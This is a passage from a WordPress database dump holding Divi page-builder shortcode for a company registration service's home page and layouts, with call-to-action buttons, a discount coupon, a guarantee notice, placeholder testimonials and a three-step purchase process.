button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][/et_pb_row][et_pb_row custom_padding=\"27px|0px|70px|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Multiple Shareholders\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  2 or more shareholders directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" custom_margin=\"-25px||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\"]<p>Your content goes here. Edit or remove this text inline or in the module Content settings.<br /> <a href=\"https://companyregistration.online/wp-content/uploads/2018/12/advance1600.png\"><img src=\"https://companyregistration.online/wp-content/uploads/2018/12/advance1600.png\" width=\"108\" height=\"108\" alt=\"\" class=\"wp-image-29449 alignnone size-full\" /></a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row custom_padding=\"27px|0px|70px|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\"]<p>Your content goes here. Edit or remove this text inline or in the module Content settings. <br /><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\"><img src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" width=\"93\" height=\"93\" alt=\"\" class=\"wp-image-28359 alignnone size-full\" style=\"float: right;\" /></a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" custom_margin=\"-25px||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][/et_pb_row][et_pb_row custom_padding=\"27px|0px|70px|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" custom_margin=\"-25px||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\"]<p>Your content goes here. Edit or remove this text inline or in the module Content settings.<br /> <a href=\"https://companyregistration.online/wp-content/uploads/2018/12/advance1600.png\"><img src=\"https://companyregistration.online/wp-content/uploads/2018/12/advance1600.png\" width=\"108\" height=\"108\" alt=\"\" class=\"wp-image-29449 alignnone size-full\" /></a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\"][et_pb_row make_fullwidth=\"on\" custom_padding=\"20px|20px||20px\" custom_margin=\"||20px|\" _builder_version=\"3.2.1\" background_color=\"#ffffff\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" box_shadow_style=\"preset3\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_shop type=\"best_selling\" columns_number=\"4\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.17.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"roll\" animation_duration=\"1050ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\r\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" image=\"https://companyregistration.online/wp-content/uploads/2018/05/MOneyBack.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset2\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.27)\" background_color_gradient_direction=\"151deg\" background_color_gradient_start_position=\"74%\" box_shadow_style=\"preset2\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"47px||47px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"roll\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\r\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Reviews\" _builder_version=\"3.0.74\" background_color=\"#fafafc\" custom_padding=\"100px|0px|100px|0px\"][et_pb_row custom_padding=\"27px|0px|140px|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" header_font=\"||||||||\" header_font_size=\"50px\" header_line_height=\"2.2em\" custom_padding=\"75px||\"]<h1 style=\"text-align: center;\">Online Wealth Resources </h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_post_slider _builder_version=\"3.17.6\" background_color=\"#eb007e\"][/et_pb_post_slider][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.0.73\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"1.8em\" header_font=\"||||||||\" header_2_font=\"Poppins||||||||\" header_2_font_size=\"28px\" header_2_line_height=\"1.4em\" header_3_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<h2>See What Our Clients Are Saying</h2>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.0.98\"][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_testimonial author=\"John Doe\" job_title=\"Web Engineer\" company_name=\"Microsoft\" quote_icon=\"off\" quote_icon_color=\"rgba(0,0,0,0)\" quote_icon_background_color=\"rgba(245,245,245,0)\" portrait_width=\"107px\" portrait_height=\"1px\" _builder_version=\"3.2\" body_font=\"Open Sans||||||||\" body_line_height=\"1.8em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" border_width_all=\"0px\" border_color_all=\"#efefef\" border_style_all=\"solid\" border_radii_portrait=\"on|100px|100px|100px|100px\" box_shadow_style=\"preset1\" box_shadow_color=\"rgba(198,198,198,0.3)\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"10%\" use_border_color=\"on\" border_color=\"#efefef\" portrait_border_radius=\"100px\"]When you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations. When you innovate, you make mistakes\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_testimonial author=\"Jane Doe\" job_title=\"Web Engineer\" company_name=\"Microsoft\" quote_icon=\"off\" quote_icon_color=\"rgba(0,0,0,0)\" quote_icon_background_color=\"rgba(245,245,245,0)\" portrait_width=\"107px\" portrait_height=\"1px\" _builder_version=\"3.2\" body_font=\"Open Sans||||||||\" body_line_height=\"1.8em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" border_width_all=\"0px\" border_color_all=\"#efefef\" border_style_all=\"solid\" border_radii_portrait=\"on|100px|100px|100px|100px\" box_shadow_style=\"preset1\" box_shadow_color=\"rgba(198,198,198,0.3)\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"10%\" use_border_color=\"on\" border_color=\"#efefef\" portrait_border_radius=\"100px\"]When you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations. When you innovate, you make mistakes\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_testimonial author=\"Jessica Blue\" job_title=\"Web Engineer\" company_name=\"Microsoft\" quote_icon=\"off\" quote_icon_color=\"rgba(0,0,0,0)\" quote_icon_background_color=\"rgba(245,245,245,0)\" portrait_width=\"107px\" portrait_height=\"1px\" _builder_version=\"3.2\" body_font=\"Open Sans||||||||\" body_line_height=\"1.8em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" border_width_all=\"0px\" border_color_all=\"#efefef\" border_style_all=\"solid\" border_radii_portrait=\"on|100px|100px|100px|100px\" box_shadow_style=\"preset1\" box_shadow_color=\"rgba(198,198,198,0.3)\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"200ms\" animation_intensity_slide=\"10%\" use_border_color=\"on\" border_color=\"#efefef\" portrait_border_radius=\"100px\"]When you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations. When you innovate, you make mistakes\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\"][et_pb_row _builder_version=\"3.17.6\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_text_color=\"#000000\" text_font_size=\"30px\"]<p style=\"text-align: center;\">After Registration Services</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|38px|0px\" _builder_version=\"3.0.89\"][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.2.1\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.2.1\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"15px|10px||10px\" animation_style=\"flip\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.2.1\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','home revamp 3','','publish','closed','closed','','home-revamp-3','','','2018-12-13 15:29:47','2018-12-13 13:29:47','',0,'https://companyregistration.online/?page_id=29421',0,'page','',0),(29443,3,'2018-12-11 14:59:34','2018-12-11 12:59:34','[et_pb_row _builder_version=\"3.17.6\" make_fullwidth=\"on\" box_shadow_style=\"preset1\" border_radii=\"on|15px|15px|15px|15px\" template_type=\"row\"][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font_size=\"31px\" header_font_size=\"28px\" header_font=\"||||||||\" text_font=\"||||||||\" text_text_color=\"#000000\"]<p style=\"text-align: center;\">Step 1</p>\n[/et_pb_text][et_pb_blurb title=\"Find The Product You Need\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-26.png\" _builder_version=\"3.17.6\" header_font=\"||||||||\" header_font_size=\"25px\" header_text_align=\"center\"]<br />\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" _builder_version=\"3.17.6\" max_width=\"80%\" custom_padding=\"63px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font_size=\"25px\" text_font=\"||||||||\" text_text_color=\"#000000\"]<p style=\"text-align: center;\">Step 2</p>\n[/et_pb_text][et_pb_blurb title=\"Purchase\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/Bank_13.png\" _builder_version=\"3.17.6\" text_orientation=\"center\" header_font=\"||||||||\" header_font_size=\"25px\" header_text_align=\"center\" body_font=\"||||||||\" body_font_size=\"19px\"]<br />\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600.png\" _builder_version=\"3.17.6\" max_width=\"80%\" custom_padding=\"63px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font_size=\"25px\" text_font=\"||||||||\" text_text_color=\"#000000\"]<p style=\"text-align: center;\">Step 3</p>\n[/et_pb_text][et_pb_blurb image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-25.png\" _builder_version=\"3.17.6\" body_font=\"||||||||\" body_font_size=\"22px\" header_font=\"||||||||\" header_font_size=\"25px\" title=\"Check your e-mails for instructions on how to complete the form\" header_text_align=\"center\"]<p style=\"text-align: center;\">step 3</p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row]','purchase process','','publish','closed','closed','','purchase-process','','','2018-12-11 14:59:34','2018-12-11 12:59:34','',0,'https://companyregistration.online/et_pb_layout/purchase-process/',0,'et_pb_layout','',0),(29449,3,'2018-12-12 11:31:45','2018-12-12 09:31:45','','advance1600','','inherit','open','closed','','advance1600-2','','','2018-12-12 11:31:45','2018-12-12 09:31:45','',0,'https://companyregistration.online/wp-content/uploads/2018/12/advance1600.png',0,'attachment','image/png',0),(29573,3,'2019-05-30 13:32:13','2019-05-30 11:32:13','[et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Hero\" _builder_version=\"3.23.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/05/business-coach-0037.jpg\" parallax=\"on\"][et_pb_fullwidth_header title=\"Registrations\" subhead=\"For Business Owners & Entrepreneurs\" button_one_text=\"Make An Appointment\" button_two_text=\"About Me\" content_max_width=\"700px\" _builder_version=\"3.16\" title_font=\"Playfair Display|700|||||||\" title_font_size=\"70px\" title_line_height=\"1.5em\" content_font=\"Nunito|600|||||||\" content_font_size=\"20px\" subhead_font=\"Lato|700|||||||\" subhead_font_size=\"30px\" subhead_line_height=\"1.8em\" background_color=\"rgba(0,0,0,0)\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(53,80,160,0.27)\" background_color_gradient_end=\"#3550a0\" background_color_gradient_direction=\"220deg\" background_color_gradient_overlays_image=\"on\" custom_button_one=\"on\" button_one_text_size=\"16px\" button_one_text_color=\"#3550a0\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"10px\" button_one_border_color=\"rgba(210,159,104,0)\" button_one_border_radius=\"100px\" button_one_font=\"Lato|900|||||||\" button_one_use_icon=\"off\" custom_button_two=\"on\" button_two_text_size=\"16px\" button_two_text_color=\"#ffffff\" button_two_bg_color=\"rgba(255,255,255,0.15)\" button_two_border_width=\"10px\" button_two_border_color=\"rgba(210,159,104,0)\" button_two_border_radius=\"100px\" button_two_font=\"Lato|900|||||||\" button_two_use_icon=\"off\" custom_margin=\"|||\" custom_padding=\"10vw||10vw||false\" custom_padding_tablet=\"20vw||20vw||true\" custom_padding_phone=\"20vw||20vw||true\" custom_padding_last_edited=\"on|desktop\" title_font_size_tablet=\"50px\" title_font_size_phone=\"32px\" title_font_size_last_edited=\"on|tablet\" button_one_text_color_hover=\"#3550a0\" button_two_text_color_hover=\"#ffffff\" button_one_bg_color_hover=\"rgba(255,255,255,0.8)\" button_two_bg_color_hover=\"rgba(255,255,255,0.3)\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"on\" button_one_text_color__hover=\"#3550a0\" button_two_text_color__hover_enabled=\"on\" button_two_text_color__hover=\"#ffffff\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"on\" button_one_bg_color__hover=\"rgba(255,255,255,0.8)\" button_two_bg_color__hover_enabled=\"on\" button_two_bg_color__hover=\"rgba(255,255,255,0.3)\"][/et_pb_fullwidth_header][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"3.22.3\" locked=\"off\"][et_pb_row _builder_version=\"3.22.3\"][et_pb_column type=\"4_4\" _builder_version=\"3.11\"][et_pb_text _builder_version=\"3.11\" text_font=\"||||||||\" text_line_height=\"1.9em\" 